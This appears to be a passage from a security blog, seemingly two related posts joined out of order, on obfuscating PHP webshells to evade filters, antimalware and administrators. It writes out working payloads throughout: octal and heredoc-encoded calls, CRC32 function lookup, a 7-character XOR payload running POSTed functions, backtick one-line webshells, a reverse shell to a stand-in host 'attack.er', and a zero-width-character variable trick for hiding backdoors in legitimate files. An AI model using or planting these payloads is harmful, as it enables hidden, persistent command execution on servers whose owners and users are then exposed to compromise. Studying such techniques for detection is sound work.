Compared to nowdocs, heredocs are like double-quoted strings, which means that it interprets escaping sequences and performs string interpolation. Therefore, the following snippet of code would set the variable $x equal to the character 'a', written here is octal:

$x = <<<_
\141
_;

Variable functions can therefore be created:

$filter_input = <<<_
\146\151\154\164\145\162\137\151\156\160\165\164
_;

and therefore, calling filter_input(0, 'a')(filter_input(0, 'b')) would be done as follows:

(<<<_
\146\151\154\164\145\162\137\151\156\160\165\164
_)(0, <<<_
\141
_)((<<<_
\146\151\154\164\145\162\137\151\156\160\165\164
_)(0, <<<_
\142
_));

NOTE: enclosing heredoc strings between parentheses seems to be mandatory, a syntax error would be raised otherwise.

Variant with letters

Since heredoc strings perform string interpolation, the symbols can be resolved within the string:

$x = <<<_
    {${$_POST[0]($_POST[1])}}
_;

Or:

$x = <<<_
    {${${chr(95).chr(80).chr(79).chr(83).chr(84)}[0](${chr(95).chr(80).chr(79).chr(83).chr(84)}[1])}}
_;

Technique #2: One-liner with only two functions

This is an extension of the fourth technique using get_defined_vars and array_keys, by chaining them in order to dynamically resolve the function name and its argument. Let’s first print the result of get_defined_vars() (no other variables declared):

Array
(
    [_GET] => Array
        (
        )

    [_POST] => Array
        (
            [a] => system
            [b] => id
        )

    [_COOKIE] => Array
        (
        )

    [_FILES] => Array
        (
        )
)

The routine array_keys can be used to retrieve the first level of this 2D-array:

Array
(
    [0] => _GET
    [1] => _POST
    [2] => _COOKIE
    [3] => _FILES
)

To execute the expected payload, one should have something like:

$post_key = array_keys(get_defined_vars())[1]; //get 2nd key
$post_data = get_defined_vars()[$post_key]; //['a' => 'system', 'b' => 'id']
$post_data_keys = array_keys($post_data); // ['a', 'b']
$system = $post_data[$post_data_keys[0]]; //['a' => 'system', 'b' => 'id'][['a','b'][0]] = 'system'
$id = $post_data[$post_data_keys[1]]; //same at index 1
$system($id);

Let’s replace all local variables with function calls:

get_defined_vars()[array_keys(get_defined_vars())[1]][array_keys(get_defined_vars()[array_keys(get_defined_vars())[1]])[0]](get_defined_vars()[array_keys(get_defined_vars())[1]][array_keys(get_defined_vars()[array_keys(get_defined_vars())[1]])[1]]);

Technique #3: F*** the system

The routine get_defined_vars is handy, but it has a drawback: it cannot be used as a variable function, making it more difficult to hide. This third technique resolves function names without hardcoding them nor passing them as argument, and uses functions that do not suffer from the same restriction. The idea is quite simple: the list of defined functions is filtered with array_filter and a submitted criterion. The matching name is dynamically called, while forwarding the second POST’ed argument.

To begin with, the list of existing routines can be obtained as follows (snipped for brevity):

Array
(
    [internal] => Array
        (
            [0] => zend_version
            [1] => func_num_args
            [2] => func_get_arg
            ...
        )
    [user] => Array
        (
        )
)

The first element of this two-dimensional array (labelled as internal) contains the list of existing functions (i.e. not user-defined). A first approach could be to locate the index of system and hardcode its key, but the latter could change, depending on the PHP configuration (loaded modules, disabled functions, etc.), making this approach quite unstable. To make it more configuration-independent, this array could be filtered with a lambda function and the routine array_filter;

Iterates over each value in the array passing them to the callback function. If the callback function returns true, the current value from array is returned into the result array.

Array keys are preserved, and may result in gaps if the array was indexed. The result array can be reindexed using the array_values() function.

To isolate the expected routine, we chose to filter on the CRC32 value (collisions may exist, though):

var_dump(array_filter(reset(get_defined_functions()), fn($x) => crc32($x) == $_POST[chr(0x61)]));

The reset function is used here because get_defined_functions returns a 2D array, and we are interested only by get_defined_functions()["internal"] (the first element). Each element is then passed to crc32, which appends to its return value all the matching items. If no collision exists, it should contain a single element. Sending a=3377271179 in the POST’ed body would return system:

array(1) {
  [683]=>
  string(6) "system"
}

The result is a named array, hence reset can be used once again to keep only system name:

$sys = reset(array_filter(reset(get_defined_functions()), fn($x) => crc32($x) == $_POST[chr(0x61)]));

One can now call the routine dynamically, passing the 2nd POST’ed argument:

reset(array_filter(reset(get_defined_functions()), fn($x) => crc32($x) == $_POST[chr(0x61)]))($_POST[chr(0x62)]);

NOTE: this technique can obviously be combined to others in order to hide the $_POST.

Technique #4: Only 7 characters

Ever heard about BrainF*ck ? This esoteric programming language made only of the symbols ><+-.,[] is more like a joke than a usable language. Alternatives have been created, such as the infamous JSF*ck, made only of six characters (()+[]!). A PHPf*ck was also created, using only seven symbols ([+.^]), but the latter is not compatible with PHP 8 (and later). An alternative exists for PHP 8, but it uses Foreign Function Interface, that is not always installed. Moreover, PHP8 makes it harder to execute code from string, since eval cannot be called as a variable function, assert does not evaluate any more the passed argument, preg_replace’s /e flag is deprecated, and create_function too.

I’m also aware that a version only uses 5 characters (mystiz.hk/posts/2021/2021-08-10-uiuctf-phpfuck/), but I wanted to do it without letters nor numbers. Still, their technique is really clever.

However, the goal here was not to evaluate something arbitrary, but to execute $_GET['A']($_GET['r']) (you will understand why ‘A’ and ‘r’, and not ‘a’ and ‘b’). I therefore had to find a way to call the routine filter_input_array to extract submitted data:

filter_input_array(int $type, array|int $options = FILTER_DEFAULT, bool $add_empty = true): array|false|null

This function is useful for retrieving many values without repetitively calling filter_input().

Fortunately, this routine only takes one argument, saving me the need to use the comma symbol. This first argument is supposed to be an integer:

• 0: INPUT_POST;
• 1: INPUT_GET ;
• 2: INPUT_COOKIE ;
• 3: undefined
• 4: INPUT_ENV ;
• 5: INPUT_SERVER.

Therefore, the not-so-obfuscated code should be as follows:

filter_input_array(0)["A"](filter_input_array(0)["r"]);

Building strings

The principle for JSF*ck or PHPf*ck is to build arbitrary strings to dynamically call variable functions, without using any letter or number. To do so, some primitives are obtained, and from this limited charset, other characters are computed. The primitive values are as follows:

[]     : can be translated to 'Array' if concatenated
![]    : true / 1
!![]   : false / empty string (similar to 0)
![]^![]: 0 / false

The difference between the two last elements is that the 3rd one is similar to false and an empty string, while the 4th one could also be represented as the string '0'

From these primitives, we can extract a charset. For instance, we can obtain the 'A' by extracting the first letter of the string 'Array'. However, the array must first be concatenated to 1 or another array to be considered as a string:

$x = ([].![]); // 'Array1'
$y = !![]; //false
$A = $x[$y]; // 'Array1'[0]

Therefore, the letter 'A' can be obtained with ([].![])[!![]]. Similarly, the letter 'r' can be obtained by doing the same at index 1: ([].![])[![]].

Since !![] and ![] are boolean/integers, being allowed to use the '+' symbol would significantly ease the process. The number 2 could be obtained with ![]+![], 3 with ![]+![]+![] and so on. Only numbers from 0 to 9 are sufficient to build any number, because it is possible to concatenate digits and turn them into numbers:

$a = (![].[])[!![]]; //'1', because it's '1Array'[0]
$b = ((![]^![]).[])[!![]]; // '0', because it's '0Array'[0]
$c = (![]^![])+(((![].[])[!![]]).(((![]^![]).[])[!![]])); // int(10)
//because it's the same as:
$c = (0 + '1'.'0'); 

Since the expression “adds” an integer and a string, the result is considered as a number with an implicit cast from string to integer. Another interesting thing is that an index expressed as a string would also be turned into an integer if such a value is expected and if possible. For instance:

echo "abcd"["X"]; // fails
echo "abcd"["2"]; // prints 'c'
echo "abcd"[2];   // also prints 'c'

This is also possible with the XOR operation without the ‘+’ symbol, but it would restrict the available numbers to those only made of 0 and 1: 10, 11, 100, etc.

However, we decided to not use the '+' symbol since it would be too easy, and to use only the numbers 0 and 1. To extract the letters 'a' and 'y' from 'Array', we therefore used a trick to extract the 11th character (index 10) of the string '11ArrayArray':

print_r((![].![].[].[])[![].(![]^![])]); // 'a'
//because it's the same as te following lines
print_r(('1'.'1'.'Array'.'Array')[(1).(1^1)]);
print_r(('11ArrayArray')[(1).(0)]);
print_r(('11ArrayArray')['1'.'0']);
print_r(('11ArrayArray')[10]);

Regarding the 'y', the principle is the same, but with a ![] less at the beginning: (![].[].[])[![].(![]^![])].

So far, the charset is as follows:

'A': 1000001: ([].![])[!![]]
'r': 1110010: ([].![])[![]]
'a': 1100001: (![].![].[].[])[![].(![]^![])]
'y': 1111001: (![].[].[])[![].(![]^![])]
'1': 0110001: ![].[][!![]]
'0': 0110000: (![]^![]).[][!![]]

Here comes the XOR

PHP also allows different types to be XORed against each other:

print_r(1 ^ 2);     // 3
print_r(1 ^ '2');   // 3
print_r(1 ^ 'A');   // fails, because 'A' cannot be cast
print_r('1' ^ 'A'); // p, because ASCII codes are XOR'ed

By doing magic with the available characters in the set, it is possible to obtain other letters:

'q': 1110001: '0' XOR 'A': (![]^![]).[][!![]] ^ ([].![])[!![]]
'B': 1000010: '0' XOR 'r': (![]^![]).[][!![]] ^ ([].![])[![]]
'Q': 1010001: '0' XOR 'a': (![]^![]).[][!![]] ^ (![].![].[].[])[![].(![]^![])]
'I': 1001001: '0' XOR 'y': (![]^![]).[][!![]] ^ (![].[].[])[![].(![]^![])]
'p': 1110000: '1' XOR 'A': ![].[][!![]] ^ ([].![])[!![]]
'C': 1000011: '1' XOR 'r': ![].[][!![]] ^ ([].![])[![]]
'P': 1010000: '1' XOR 'a': ![].[][!![]] ^ (![].![].[].[])[![].(![]^![])]
'H': 1001000: '1' XOR 'y': ![].[][!![]] ^ (![].[].[])[![].(![]^![])]

The charset we have now is still too small to be able to obtain any character. We can realise that by taking a look at the binary codes of the obtained characters. None of them has its 5th bit set, which means that the XOR operation between them will always leave it cleared. Although it is possible to obtain more characters by XORing more than two operands, the 5th bit is annoying.

Finding a suitable character having this bit set was quite challenging. A first idea way to obtain it through the value INF:

var_dump(![]+((![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![]).(![])).[]);
//output: string(8) "INFArray"

This string starts with ![] to first consider the value as a number. Then, 309 (![]) are appended to build the number 11…1, translated into the value float(INF) (having only 308 times this pattern would give float(1.1111111111111112E+308)). Once this INF is obtained, it is concatenated with [] to turn it back into a string: 'INFArray'. Accessing the second letter ('N') would be useful since its ASCII code is 78 = 0b1001110.

However, this payload seemed a bit too big (it is only to get an intermediary variable in order to obtain a single character …), hence we decided to look for another approach.

The answer to everything

The legend says that THE ANSWER is in the digits of Pi, and indeed, that was my way to go. Indeed, the letters ‘P’ and ‘i’ both belong to the extended charset, making us able to call pi(). The pi routine returns the number 3.1415926535898. Casting this value as a string would make us able to extract the dot ('.') at index 1.

print_r(((((![].[][!![]]^(![].![].[].[])[![].(![]^![])]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]); // '.'
//because it is the same as:
print_r(('pI'().'Array')[1]);
print_r('3.1415926535898Array'[1]);

Another technique would extract the '4' instead. This character is at index 3, and we could access it by calling (pi().[])[pi()]. The float value would be treated as an integer while acting as an index, indeed returning (pi().'Array')[3] = '3.1415926535898Array'[3] = '4'

Once this value is obtained, the other digits can be computed, and translated as follows:

'0': 0110000 (![]^![]).[][!![]]
'1': 0110001 ![].[][!![]]
'2': 0110010 ([].![])[!![]]^([].![])[![]]^(![]^![]).[][!![]]^![].[][!![]]
'3': 0110011 ([].![])[!![]]^([].![])[![]]
'4': 0110100 ([].![])[!![]]^([].![])[![]]^(![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^![].[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]
'5': 0110101 ([].![])[!![]]^([].![])[![]]^(![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^(![]^![]).[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]
'6': 0110110 (![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]
'7': 0110111 (![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^(![]^![]).[][!![]]^![].[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]
'8': 0111000 ([].![])[!![]]^(![].[].[])[![].(![]^![])]
'9': 0111001 ([].![])[!![]]^(![].[].[])[![].(![]^![])]^(![]^![]).[][!![]]^![].[][!![]]

Building the final payload

As stated earlier, the final payload should do something like:

filter_input_array(0)["A"](filter_input_array(0)["r"]);
//same as
filter_input_array(!![])["A"](filter_input_array(!![])["r"]);
//same as
filter_input_array(!![])[([].![])[!![]]](filter_input_array(!![])[([].![])[![]]]);

Since the strings 'A' and 'r' are part of the restricted charset, it is easier to use them as POST arguments. Last step is then to rebuild filter_input_array. The missing characters are:

f: '4'^'r':         ([].![])[!![]]^([].![])[![]]^(![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^![].[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^([].![])[![]]
i: '0'^'y':         (![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]
l: '5'^'y':         ([].![])[!![]]^([].![])[![]]^(![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^(![]^![]).[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^(![].[].[])[![].(![]^![])]
t: '5'^'a':         ([].![])[!![]]^([].![])[![]]^(![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^(![]^![]).[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^(![].![].[].[])[![].(![]^![])]
e: '7'^'r':         (![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^(![]^![]).[][!![]]^![].[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^([].![])[![]]
_: 'r'^'5'^'y'^'a': ([].![])[![]]^([].![])[!![]]^([].![])[![]]^(![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^(![]^![]).[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^(![].[].[])[![].(![]^![])]^(![].![].[].[])[![].(![]^![])]
n: '7'^'y':         (![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^(![]^![]).[][!![]]^![].[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^(![].[].[])[![].(![]^![])]
p: '1'^'a':         ![].[][!![]]^(![].![].[].[])[![].(![]^![])]
u: '4'^'a':         ([].![])[!![]]^([].![])[![]]^(![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^![].[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^(![].![].[].[])[![].(![]^![])]

Note that the final 'array' in the function name can only be replaced by [], since PHP does not care about the case, and writing fIlTer_iNpuT_Array should be perfectly fine (same as "filter_input_".[]). Each letter is put between parentheses, and the final payload is as follows:

((([].![])[!![]]^([].![])[![]]^(![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^![].[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^([].![])[![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]).(([].![])[!![]]^([].![])[![]]^(![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^(![]^![]).[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^(![].[].[])[![].(![]^![])]).(([].![])[!![]]^([].![])[![]]^(![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^(![]^![]).[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^(![].![].[].[])[![].(![]^![])]).((![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^(![]^![]).[][!![]]^![].[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^([].![])[![]]).(([].![])[![]]).( ([].![])[![]]^([].![])[!![]]^([].![])[![]]^(![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^(![]^![]).[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^(![].[].[])[![].(![]^![])]^(![].![].[].[])[![].(![]^![])]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]).((![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^(![]^![]).[][!![]]^![].[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^(![].[].[])[![].(![]^![])]).(![].[][!![]]^(![].![].[].[])[![].(![]^![])]).(([].![])[!![]]^([].![])[![]]^(![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^![].[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^(![].![].[].[])[![].(![]^![])]).(([].![])[!![]]^([].![])[![]]^(![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^(![]^![]).[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^(![].![].[].[])[![].(![]^![])]).(([].![])[![]]^([].![])[!![]]^([].![])[![]]^(![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^(![]^![]).[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^(![].[].[])[![].(![]^![])]^(![].![].[].[])[![].(![]^![])]).[])(!![])[([].![])[!![]]](((([].![])[!![]]^([].![])[![]]^(![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^![].[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^([].![])[![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]).(([].![])[!![]]^([].![])[![]]^(![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^(![]^![]).[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^(![].[].[])[![].(![]^![])]).(([].![])[!![]]^([].![])[![]]^(![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^(![]^![]).[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^(![].![].[].[])[![].(![]^![])]).((![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^(![]^![]).[][!![]]^![].[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^([].![])[![]]).(([].![])[![]]).( ([].![])[![]]^([].![])[!![]]^([].![])[![]]^(![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^(![]^![]).[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^(![].[].[])[![].(![]^![])]^(![].![].[].[])[![].(![]^![])]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]).((![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^(![]^![]).[][!![]]^![].[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^(![].[].[])[![].(![]^![])]).(![].[][!![]]^(![].![].[].[])[![].(![]^![])]).(([].![])[!![]]^([].![])[![]]^(![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^![].[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^(![].![].[].[])[![].(![]^![])]).(([].![])[!![]]^([].![])[![]]^(![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^(![]^![]).[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^(![].![].[].[])[![].(![]^![])]).(([].![])[![]]^([].![])[!![]]^([].![])[![]]^(![].![].[].[])[![].(![]^![])]^(![].[].[])[![].(![]^![])]^(![]^![]).[][!![]]^((((([].![])[!![]]^![].[][!![]]).((![]^![]).[][!![]]^(![].[].[])[![].(![]^![])]))()).[])[![]]^(![].[].[])[![].(![]^![])]^(![].![].[].[])[![].(![]^![])]).[])(!![])[([].![])[![]]])

Only 7 characters (:

To ease the process of symbols generation, the following python script has been created:

import itertools
x = [ord(_) for _ in ['A', 'r', 'a', 'y', '0', '1', '.']]
dico = {}
for lim in range(2, 4):
    for iter in itertools.combinations(x, lim):
        xored = reduce(lambda i, j: i ^ j, iter)
        if xored not in dico:
            dico[xored] = "^".join([chr(_) for _ in iter])
        if xored not in x:
            x.append(xored)
print(dico)

After the first round, all symbols in 0-255 are expressed as XOR operations, and some manipulations still need to be done to keep only primitives.

Conclusion

These techniques are not all completely new. They can be combined to evade filters depending on the needs, but the more complex they are, the easier it is to spot them during a manual analysis. Possibilities are endless, and since PHP is a malleable language, we only scratched the surface.

References

• b-viguier.github.io/PhpFk/
• mystiz.hk/posts/2021/2021-08-10-uiuctf-phpfuck/

Do you think such a piece of code could be harmful ?

list($x, $x‍) = $_POST;
$x($x‍);

If no, please continue reading …

Intro

Although it is fun to find tricky client-side injections, path traversals or IDORs in web applications, it is generally much more satisfying to gain arbitrary code execution (or even better, a command execution). Therefore, arbitrary code execution (or generally referred to as RCE - Remote Code Execution) is not a vulnerability per se, but is the attack resulting from an exploited vulnerability (or a chain of vulnerabilities). Multiple vulnerabilities are known to potentially be the root cause of an RCE, such as (and not limited to):

• Local File Inclusion, for which an attacker includes a data stream so as to evaluate it ;
• SQL injection, if the DBMS capabilities allow it, and if the abused service account is privileged enough (local file writes, xp_cmd_shell, COPY ... FROM PROGRAM, etc.) ;
• Unrestricted File Upload / Arbitrary File Write, for which an attacker can drop their own scripts on the server, and is able to make the latter execute them ;
• Unsafe Deserialisation, for which an attacker creates arbitrary objects, and possibly calls arbitrary routines ;
• Commands Injection, for which an attacker includes their own commands into a legitimate one ;

However, gaining an arbitrary code execution is not always an immediate game over, because:

• Turning the code execution into command execution might be sometimes tricky ;
• The attacker generally wants to be the only one controlling the target, and wants to prevent the server from being compromised by someone else ;
• An antimalware solution might be triggered by obvious payloads, that could also warn the webmaster ;
• This same webmaster, while doing their daily routine, might be triggered by unexpected artefacts (e.g. files, logs) ;
• Ensuring persistence is also a commonly pursued goal, saving the need of a future re-exploitation ;

Being stealth and efficient at the same time might be challenging. As a first common approach, attackers could leave powerful webshells somewhere on the disk, at an unexpected location where it is unlikely that a webmaster finds them. A second common solution would be to open a reverse shell, if possible, with something like:

$sock = fsockopen("attack.er",1234);
$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);

If the host and port are hardcoded, it might only appear as a hanging blank page to those who find it unintentionally, and cannot be abused by other attackers. Finally, a third common approach would be to drop only a minimalist webshell such as

<?=`$_GET[0]`;?>

The payload can be written in its own file, or hidden somewhere in a legitimate one, where it is more difficult to find.

Obfuscation or minimalism ?

In the first case, powerful webshells are often heavily obfuscated. Taking a look at the malware should quickly raise suspicion with weird symbols, dirty code, escaped strings, etc. To let the compromised web site work properly, it is common for such webshells to be either put in their own files, or prepended or appended to legitimate ones. For instance, let’s take a look at this webshell I found on a compromised WordPress site:

The principle of this one is quite simple: the file reads itself and looks for the marker ?>, indicating the end of the PHP code (the encoded text starting with =0UV..., in this case). The data after the marker is then saved as $L66Rgr[1] and its decoded version as L6CRgr[2]. Then preg_replace is used as a pretext to execute eval on the latter.

Some other webshells also put an encrypted payload in an external text file, and use poor crypto to recover and evaluate it. Not shown here to keep it simple, but the class UnsafeCrypto only uses openssl_* functions to decrypt/encrypt with aes-256-ctr and hardcoded parameters.

Finally, let’s take this other webshell, coming as a backdoored index.php file:

No doubt that the second line has nothing to do there, and that someone who knows a little bit of PHP and security would find it suspicious. Although it would take time to fully understand what this webshell does (assuming that it is unknown), the malicious intent is quite obvious. To make it stealthier, an attacker could prefer another approach: injecting something like `$_GET[0]`; somewhere in a legitimate PHP file (note the backticks). This code executes GET arguments as a bash command, because of the backtick operators, acting like a call to shell_exec. Such a tiny line would not raise much suspicion if lost in the legitimate code.

One could identify three main strategies for such tiny payloads:

• Having a webshell that calls an exec-like functions (system, passthru, shell_exec or the backtick operator, proc_open, popen, pcntl_exec), passing as argument a user-supplied input (e.g. <?php system($_GET[0]); ?>). Indeed, what an attacker generally wants is to execute bash commands ;
• Having a webshell that calls eval-like functions, knowing that alternatives are made more difficult to exploit with PHP 8. This second solution makes the webshell even more versatile, but the drawback is that eval cannot be used as a variable function. Whereas it is possible to call system with something like ('sys'.'tem')/**/('id');, doing so with eval would not work (source: Variable functions) ;
• Having a webshell for which function names are dynamically resolved with variable functions, such as <?php $_GET['a']($_GET['b']); ?>. This third solution is an in between since it does not hardcode the routine name, while still being a bit more restrictive than an eval.

The extract routine

An uncommon way to apply the third solution is to use the routine extract (documentation). According to the documentation:

extract — Import variables into the current symbol table from an array
…
Do not use extract() on untrusted data, like user input (e.g. $_GET, $_FILES).

In other words, such a piece of code:

extract(array("a" => "b", "c" => "d"));

would create the variable $a = "b" and $c = "d". Combining it with variable functions, it is now clear that $_GET['a']($_GET['b']); could be written as:

extract($_GET);
$a($b);

In other words, using extract in this way is like setting register_globals to on.

The routine parse_str could have the same effect if it is used with only one argument. But as of PHP 8.0.0, the second parameter is mandatory.

The list routine

Another interesting routine similar to extract is list. As stated in the doc:

Like array(), this is not really a function, but a language construct. list() is used to assign a list of variables in one operation. Strings cannot be unpacked and list() expressions cannot be completely empty.

Compared to extract, the documentation does not warn here against misuses. My guess is that a misuse of extract would involve the passed parameter (a user-controlled array), while a misuse of list would involve the right side of the assignment, and therefore not something directly related to the routine itself. For example, the following snippet would create the variables $drink, $color and $power, respectively assigning to them the values coffee, brown, and caffeine (from the doc).

$info = array('coffee', 'brown', 'caffeine');
list($drink, $color, $power) = $info;

To make it behave like extract, one would need to write something like:

list($a,$b) = $_POST;
$a($b);

To trigger the code execution, one would then need to send something like:

By default, index names are increasing integers. The extract solution has the advantage that no obvious relation exists between the $_POST and the variables $a and $b;

Weird PHP variables

Does this tiny PHP file seem harmful ?

list($x, $x‍) = $_POST;
$x($x‍);

These two lines of PHP code could be put somewhere in a legitimate file (maybe not as sequential instructions).

Of course, the second line extracts untrusted data and creates variables from it, and uses it to call variable functions. However, it seems that it can only be something like 'system'('system') or 'exec'('exec'), with the argument value being the same as the function name, and such instructions should not be useful. Is it, really ?

However, running an xxd on the file reveals that the second $x is actually not the same as the first one. The variable name also contains the U+200D ZERO WIDTH JOINER character (\xE2\x80\x8D).

Some odd non-printable characters are appended to its name. According to the PHP documentation, variable names are valid as long as they follow this regular expression:

^[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff]*$

